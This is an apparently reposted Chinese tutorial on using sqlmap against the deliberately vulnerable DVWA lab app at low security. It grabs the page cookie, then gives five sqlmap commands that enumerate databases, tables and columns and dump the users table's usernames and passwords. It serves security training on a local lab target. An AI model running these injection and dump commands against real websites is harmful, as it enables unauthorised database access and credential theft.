使用Sqlmap对dvwa进行sql注入测试(初级阶段)
0.測試準備
1)打開Kali虛擬機終端;
2)打開靶機OWASP,并通過瀏覽器,輸入IP地址進入dvwa的主頁,然后選擇SQL injection進入SQL注入的測試頁面
1.獲取DVWA的url和cookie
在輸入框中輸入1,顯示有內容,此時利用此URL進行SQL注入。
輸入document.cookie獲取頁面的cookie。去除remem_token字段的內容,用于下文的sql注入終端的cookie。
3.在終端開始測試
1)終端中輸入指令一:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” --dbs
結果如下,說明找到了連個數據庫dvwa和information_schema,接下來獲取數據庫dvwa 中的表格。
2)在終端中輸入指令二:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa --tables
結果如下,發現有兩個表格,guestbook和users,接下來獲取users數據表中有哪些列。
3)在終端中輸入指令三:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --columns
結果如下,說明users一共有六列,接下來獲取具體內容
4)在終端中輸入指令四,有提示信息則輸入y:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users --dump
結果如下,表格中的數據即顯示。
5)若數據庫中數據較多,可在終端中輸入指令五,只輸出用戶名和密碼字段:
sqlmap -u"http://192.168.134.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie “security=low; PHPSESSID=lcph9vq217i7bkio8piu6h5td2” -D dvwa -T users -C “user,password” --dump
結束!
總結
以上是生活随笔為你收集整理的使用Sqlmap对dvwa进行sql注入测试(初级阶段)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 网络爬虫--13.数据提取之JSON与J
- 下一篇: Multisim使用入门教程